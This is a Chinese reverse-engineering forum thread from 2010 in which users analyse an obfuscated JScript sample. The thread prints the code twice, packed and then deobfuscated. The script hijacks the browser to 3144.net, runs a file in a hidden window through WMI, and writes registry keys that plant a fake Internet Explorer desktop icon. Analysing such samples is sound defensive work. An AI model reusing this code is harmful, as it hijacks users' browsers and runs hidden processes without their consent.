首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
[讨论]都来看看这个流氓在干啥
发表于: 2010-10-31 20:13 7560

[讨论]都来看看这个流氓在干啥

BlueT 活跃值
2
2010-10-31 20:13
7560
看了半天也没看出名堂来,会这个说说看,这流氓在干啥:

//815465573

//___C:\Program Files\Internet Explorer\Iexplore.exe___
//____http://3144.net/?tt____

eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'([02-9dh-pr-zABF-OQ-Z]|1\\w)'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0 n,o;WshShell=h i("9.6");0 y=p(){0 z=9.ScriptFullName;0 f=o.OpenTextFile(z,1);0 r=f.ReadAll();0 A=/B(.*?)B/F;0 G=/H(.*?)H/F;0 a=\'\',b=\'\';I(A.J(r)){a=K.$1;a=a.replace(/\\\\/g,"\\\\\\\\");0 _fkurl="";I(G.J(r)){b=K.$1;3{n.Run(\'"\'+a+\'" \'+b,1,false)}4(e){}}}};0 L=p(){n=h i(\'9.6\');o=h i(\'M.N\')};L();y();0 P=h i("9.6");0 q=h i("M.N");0 d=P.O("Templates");0 StartPath=P.O("AllUsersStartup");0 k=parseInt(Q.floor(Q.random()*9999));3{0 R="c:\\\\";0 OldPath=P.S;P.S=d;9.T(5000);q.CopyFile(R+"index.htm",d+"\\\\"+k);U(d+"\\\\"+k,d);9.T(60000);q.DeleteFile(d+"\\\\"+k)}4(E){};p U(V,W){0 X=12;0 Y=Z("11:{13=14}!\\\\\\\\.\\\\15\\\\16:win32_processstartup");0 s=Y.SpawnInstance_();s.ShowWindow=X;0 17="";0 18=Z("11:{13=14}!\\\\\\\\.\\\\15\\\\16:Win32_Process");18.Create(V,W,s,17)};0 2="{86AEFBE8-763F-0647-899C-A93278894D8E}";0 19="http://http://www.3144.net/?tt";3{P.5("1a\\\\1b\\\\t\\\\u\\\\v\\\\j\\\\1c\\\\NewStartPanel\\\\{1d-1e-1f-1g-1h}",1,"w")}4(e){};3{P.5("1a\\\\1b\\\\t\\\\u\\\\v\\\\j\\\\1c\\\\ClassicStartMenu\\\\{1d-1e-1f-1g-1h}",1,"w")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\","l 1i","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\DefaultIcon\\\\","C:\\\\1j 1k\\\\l j\\\\1l.m","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\","","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\D\\\\x\\\\","1m.m 1n.1o,1p 1q.1r","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\Open\\\\x\\\\","C:\\\\1j 1k\\\\l j\\\\1l.m "+19,"8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\6\\\\属性\\\\x\\\\","1m.m 1n.1o,1p 1q.1r","8")}4(e){};3{P.5("7\\\\2\\\\"+2+"\\\\1s\\\\1s","10","w")}4(e){};3{P.5("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\t\\\\u\\\\v\\\\j\\\\Desktop\\\\NameSpace\\\\"+2+"\\\\","l 1i","8")}4(e){};',[],91,'var||CLSID|try|catch|RegWrite|Shell|HKEY_CLASSES_ROOT|REG_SZ|WScript||||TempPath||||new|ActiveXObject|Explorer|_0|Internet|exe|_ws|_sf|function||fc|objConfig|Microsoft|Windows|CurrentVersion|REG_DWORD|Command|RunLnkFile|sfn|_o1|___||||ig|_o2|____|if|test|RegExp|Init|Scripting|FileSystemObject|SpecialFolders||Math|dhead|CurrentDirectory|Sleep|CreateWin32|_1|_2|HIDDEN_WINDOW|WMI|GetObject||winmgmts||impersonationLevel|impersonate|root|cimv2|intProcessID|objProcess|URL|HKEY_CURRENT_USER|Software|HideDesktopIcons|871C5380|42A0|1069|A2EA|08002B30309D|Exploer|Program|Files|Iexplore|Rundll32|Shell32|dll|Control_RunDLL|Inetcpl|cpl|ShellFolder'.split('|'),0,{}))
//815465573

[注意]看雪招聘,专注安全领域的专业人才平台!

收藏
免费
支持
分享
最新回复 (5)
BlueT
雪    币: 517
活跃值: (35)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
私信
2
没人看出个名堂来哈?

2010-11-3 20:04
0
loqich
雪    币: 952
活跃值: (2006)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
还不知道别人在干嘛就说别人是流氓。。。。。。。。无语啊。。。。。。。。。
2010-11-3 22:53
0
dalao
雪    币: 1866
活跃值: (95)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
私信
4
vbs病毒吧!
应该是个锁ie的vbs
2010-11-4 02:34
0
是昔流芳
雪    币: 116
活跃值: (25)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
5
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
var _ws,_sf;
WshShell=new ActiveXObject("WScript.Shell");
var RunLnkFile=function()
{
  var sfn=WScript.ScriptFullName;
  var f=_sf.OpenTextFile(sfn,1);
  var fc=f.ReadAll();
  var _o1=/___(.*?)___/ig;
  var _o2=/____(.*?)____/ig;
  var a='',b='';
  if(_o1.test(fc))
  {
    a=RegExp.$1;
    a=a.replace(/\\/g,"\\\\");
    var _fkurl="";
    if(_o2.test(fc))
    {
      b=RegExp.$1;
      try
      {
        _ws.Run('"'+a+'"  '+b,1,false)
      }
      catch(e)
      {
         
      }
       
    }
     
  }
   
}
;var Init=function()
{
  _ws=new ActiveXObject('WScript.Shell');
  _sf=new ActiveXObject('Scripting.FileSystemObject')
}
;Init();
RunLnkFile();
var P=new ActiveXObject("WScript.Shell");
var q=new ActiveXObject("Scripting.FileSystemObject");
var TempPath=P.SpecialFolders("Templates");
var StartPath=P.SpecialFolders("AllUsersStartup");
var _0=parseInt(Math.floor(Math.random()*9999));
try
{
  var dhead="c:\\";
  var OldPath=P.CurrentDirectory;
  P.CurrentDirectory=TempPath;
  WScript.Sleep(5000);
  q.CopyFile(dhead+"index.htm",TempPath+"\\"+_0);
  CreateWin32(TempPath+"\\"+_0,TempPath);
  WScript.Sleep(60000);
  q.DeleteFile(TempPath+"\\"+_0)
}
catch(E)
{
   
}
;function CreateWin32(_1,_2)
{
  var HIDDEN_WINDOW=12;
  var WMI=GetObject("winmgmts:
  {
    impersonationLevel=impersonate
  }
  !\\\\.\\root\\cimv2:win32_processstartup");
  var objConfig=WMI.SpawnInstance_();
  objConfig.ShowWindow=HIDDEN_WINDOW;
  var intProcessID="";
  var objProcess=GetObject("winmgmts:
  {
    impersonationLevel=impersonate
  }
  !\\\\.\\root\\cimv2:Win32_Process");
  objProcess.Create(_1,_2,objConfig,intProcessID)
}
;var CLSID="
{
  86AEFBE8-763F-0647-899C-A93278894D8E
}
";
var URL="http://http://www.3144.net/?tt";
try
{
  P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\NewStartPanel\\
  {
    871C5380-42A0-1069-A2EA-08002B30309D
  }
  ",1,"REG_DWORD")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\HideDesktopIcons\\ClassicStartMenu\\
  {
    871C5380-42A0-1069-A2EA-08002B30309D
  }
  ",1,"REG_DWORD")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\","Internet Exploer","REG_SZ")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\DefaultIcon\\","C:\\Program Files\\Internet Explorer\\Iexplore.exe","REG_SZ")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\","","REG_SZ")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\D\\Command\\","Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\Open\\Command\\","C:\\Program Files\\Internet Explorer\\Iexplore.exe "+URL,"REG_SZ")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\Shell\\^'\\Command\\","Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl","REG_SZ")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_CLASSES_ROOT\\CLSID\\"+CLSID+"\\ShellFolder\\ShellFolder","10","REG_DWORD")
}
catch(e)
{
   
}
;try
{
  P.RegWrite("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\"+CLSID+"\\","Internet Exploer","REG_SZ")
}
catch(e)
{
   
}
;
2010-11-4 05:47
0
BlueT
雪    币: 517
活跃值: (35)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
私信
6
谢谢,这样看就清楚多了。
2010-11-4 18:45
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》